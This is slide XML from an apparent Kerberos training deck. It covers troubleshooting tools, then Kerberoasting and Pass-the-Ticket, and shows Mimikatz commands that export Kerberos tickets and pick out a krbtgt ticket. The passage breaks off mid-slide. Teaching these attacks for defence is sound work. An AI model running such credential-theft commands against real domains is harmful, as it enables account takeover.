              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>KDC: in System Event log, extendable via setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>KdcExtraLogLevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, ref. KB 2009157 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>KDC_ERR_C_PRINCIPAL_UNKNOWN Returned in S4U2Self Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>” or KB 947124</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Toolset:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Network Monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Kerberos transmits many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>unencrypted configuration information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>via the network (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Cname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Sname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, SPN, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>PaData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ETypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>), therefore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>NetMon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> Traces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>are very valuable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>KLIST.EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: RTM tool since Vista, parameter /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>TICKETS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (default) shows ticket cache, /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>PURGE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> can be used enforcing ticket generation for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>NetMon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> tracing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>SETSPN.EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: RTM tool to check and register SPNs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>LDIFDE.EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>LDP.EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: LDAP tools to view and export account settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>IPCONFIG /FLUSHDNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>NBTSTAT -R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> : Flush names caches; proper name resolution is often key for correct ticketing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Troubleshooting</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162068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dirty="0"/>
              <a:t>Kerberos Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 1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85058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err="1"/>
              <a:t>Kerberoast</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3662541"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Kerberoast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be an effective method for extracting service account credentials from Active Directory as a regular user without sending any packets to the target system. This attack is effective since people tend to create poor passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Dictionary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vulnarabilities</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14850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Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnarabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass the Ticket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648742" y="1463040"/>
            <a:ext cx="7924800" cy="615553"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass the Ticket (PPT) allows to inject exported Kerberos tickets into the current session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7D0E2C5-8FC2-46E5-84FC-736ED0DE8F2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3852936" y="4779408"/>
            <a:ext cx="7235626" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="LID4096" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6015CD43-8430-4E40-8900-CB55406ABEE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="274692" y="2166075"/>
            <a:ext cx="8643998" cy="3228885"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7097"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3051EEE5-57FD-4D22-B153-1EA137C18961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274692" y="2306370"/>
            <a:ext cx="1284270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE358881-800D-4769-88F7-4611523FE235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1416980" y="4337761"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FDDC315-198F-4D68-9B43-91226C5FE6E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274824" y="2276872"/>
            <a:ext cx="7643866" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\mimikatz\x64\mimikatz.exe "Kerberos::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>export</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D8CE8D0-44D0-48D9-82FC-907B58C063B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271902" y="2301488"/>
            <a:ext cx="1284270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8269B3F2-383D-4D3F-8D19-22B78121110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274824" y="3009146"/>
            <a:ext cx="7643866" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = dir C:\mimikatz\x64 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Where-Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Name -Match '(?=.*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)(?=.*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)' | Select-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -First 1 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ExpandProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448AA1BB-1D91-4566-85A0-423A7BA5764F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271902" y="3033762"/>
            <a:ext cx="1284270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EB3756D-C63F-4521-917D-8450344B2874}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
